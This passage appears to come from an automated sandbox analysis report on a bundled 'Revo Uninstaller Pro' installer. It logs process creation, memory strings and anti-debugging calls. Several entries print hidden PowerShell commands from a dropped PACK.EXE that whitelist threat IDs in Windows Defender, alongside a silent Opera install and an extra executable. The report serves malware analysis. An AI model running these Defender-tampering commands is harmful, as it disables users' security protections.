      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1191E7D4A-4EB2-437E-9800-03CB58C0B8266.3QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1ADE47139-1A57-4F07-B628-BF198A9B846210.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.16CEB785C-9851-E072-BDA1-6F0F1796D2B86.3QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeAPI call chain: ExitProcess graph end nodegraph_0-3986
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEAPI call chain: ExitProcess graph end nodegraph_16-23543
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeAPI call chain: ExitProcess graph end nodegraph_26-3638
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00FEE4F5
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FF6AF3 mov eax, dword ptr fs:[00000030h]16_2_00FF6AF3
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FFACA1 GetProcessHeap,16_2_00FFACA1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00FEE4F5
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEE643 SetUnhandledExceptionFilter,16_2_00FEE643
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEE7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00FEE7FB
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FF7BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00FF7BE1
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"Jump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bcJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECTJump to behavior
      Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -oJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\PACK.EXE C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="ZTEzMzE3M2U4ODhkN2Y3YmE0ODQ3NmYwNmNlNmJmMDE4NmY4MzAzYmNmNWRmMWYyYmVlYWJmNDExZjE1ZDAzODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYzMjQyLjI2MjIiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiY2Q5ZjgxYzYtNzI5YS00ZDk1LWFjNzEtMWViYmE3NWJmYzdiIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
      Source: C:\Users\user\Downloads\OperaSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --silent --allusers=0 --server-tracking-blob=njaxodrkytk2nmvjnjfhzdrjzmfkogu5ndayogewywnlyzvizge5zjvkytg0ymuwmzjizdrjzwfjzgq4odm0njp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijoib3blcmeilcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cz91dg1fc291cmnlpurxtkxtvcz1dg1fbwvkaxvtpwfwyiz1dg1fy2ftcgfpz249cjewiiwidgltzxn0yw1wijoimtczmzc2mzi0mi4ynjiyiiwidxnlcmfnzw50ijoitlnju19jbmv0yyaotw96awxsyskilcj1dg0ionsiy2ftcgfpz24ioijymtailcjtzwrpdw0ioijhcgiilcjzb3vyy2uioijev05mu1qifswidxvpzci6imnkowy4mwm2ltcyowetngq5ns1hyzcxltflymjhnzvizmm3yij9
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe "c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="c:\users\user\appdata\local\programs\opera" --profile-folder --language=en-gb --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="c:\users\user\appdata\local\temp\.opera\opera installer temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="ztezmze3m2u4odhkn2y3yme0odq3nmywnmnlnmjmmde4nmy4mzazymnmnwrmmwyyymvlywjmndexzje1zdazodp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijp7im5hbwuioijvcgvyysj9lcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cz91dg1fc291cmnlpurxtkxtvcz1dg1fbwvkaxvtpwfwyiz1dg1fy2ftcgfpz249cjewiiwic3lzdgvtijp7inbsyxrmb3jtijp7imfyy2gioij4odzfnjqilcjvchn5cyi6ildpbmrvd3milcjvchn5cy12zxjzaw9uijoimtailcjwywnrywdlijoirvhfin19lcj0aw1lc3rhbxaioiixnzmznzyzmjqylji2mjiilcj1c2vyywdlbnqioijou0ltx0luzxrjichnb3ppbgxhksisinv0bsi6eyjjyw1wywlnbii6inixmcisim1lzgl1bsi6imfwyiisinnvdxjjzsi6ikrxtkxtvcj9lcj1dwlkijoiy2q5zjgxyzytnzi5ys00zdk1lwfjnzetmwviyme3nwjmyzdiin0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
      Source: C:\Users\user\Downloads\OperaSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --silent --allusers=0 --server-tracking-blob=njaxodrkytk2nmvjnjfhzdrjzmfkogu5ndayogewywnlyzvizge5zjvkytg0ymuwmzjizdrjzwfjzgq4odm0njp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijoib3blcmeilcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cz91dg1fc291cmnlpurxtkxtvcz1dg1fbwvkaxvtpwfwyiz1dg1fy2ftcgfpz249cjewiiwidgltzxn0yw1wijoimtczmzc2mzi0mi4ynjiyiiwidxnlcmfnzw50ijoitlnju19jbmv0yyaotw96awxsyskilcj1dg0ionsiy2ftcgfpz24ioijymtailcjtzwrpdw0ioijhcgiilcjzb3vyy2uioijev05mu1qifswidxvpzci6imnkowy4mwm2ltcyowetngq5ns1hyzcxltflymjhnzvizmm3yij9
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe "c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="c:\users\user\appdata\local\programs\opera" --profile-folder --language=en-gb --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="c:\users\user\appdata\local\temp\.opera\opera installer temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="ztezmze3m2u4odhkn2y3yme0odq3nmywnmnlnmjmmde4nmy4mzazymnmnwrmmwyyymvlywjmndexzje1zdazodp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijp7im5hbwuioijvcgvyysj9lcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cz91dg1fc291cmnlpurxtkxtvcz1dg1fbwvkaxvtpwfwyiz1dg1fy2ftcgfpz249cjewiiwic3lzdgvtijp7inbsyxrmb3jtijp7imfyy2gioij4odzfnjqilcjvchn5cyi6ildpbmrvd3milcjvchn5cy12zxjzaw9uijoimtailcjwywnrywdlijoirvhfin19lcj0aw1lc3rhbxaioiixnzmznzyzmjqylji2mjiilcj1c2vyywdlbnqioijou0ltx0luzxrjichnb3ppbgxhksisinv0bsi6eyjjyw1wywlnbii6inixmcisim1lzgl1bsi6imfwyiisinnvdxjjzsi6ikrxtkxtvcj9lcj1dwlkijoiy2q5zjgxyzytnzi5ys00zdk1lwfjnzetmwviyme3nwjmyzdiin0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.00000000033A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BSYSLISTVIEW32SHELLDLL_DefViewSysListView32Program ManagerProgman
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: TrayNotifyWndHunter TopHunter RightHunter LeftShell_TrayWndHunter Window AOTHunter Window SizeHunter ModeHunter Bottom\Microsoft\Internet Explorer\Quick LaunchStart HunterHunter TransparencySDSysPagerToolbarWindow32SHELLDLL_DefViewSysListView3275%50%25%ReBarWindow32 /tn "Revo Uninstaller Pro Hunter Mode" /create /XML " /hunter\Explorer.exe/Delete /TN "Revo Uninstaller Pro Hunter Mode" /F schtasks.exe6.1Windows 7,8,VistaWindows XPWindows XP,Vista,7,8Windows 86.25.1Windows 7Windows Vista6.0Windows 8.16.310.110.05.2 %D %sUDMFT%06d%sUDTMP%sEVREM%06d %S %M %H %Tc%02ld
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpBinary or memory string: Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TrayNotifyWndHunter RightHunter TopShell_TrayWndHunter LeftHunter Window SizeHunter Window AOTHunter BottomHunter ModeStart Hunter\Microsoft\Internet Explorer\Quick LaunchSDHunter TransparencyToolbarWindow32SysPagerSysListView32SHELLDLL_DefView50%75%ReBarWindow3225%/create /XML /tn "Revo Uninstaller Pro Hunter Mode" \Explorer.exe" /hunterschtasks.exe/Delete /TN "Revo Uninstaller Pro Hunter Mode" /F
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000005140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSLISTVIEW32SHELLDLL_DefViewSysListView32Program ManagerProgman`
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEE34B cpuid 16_2_00FEE34B
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: GetLocaleInfoW,GetNumberFormatW,16_2_00FE9D99
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
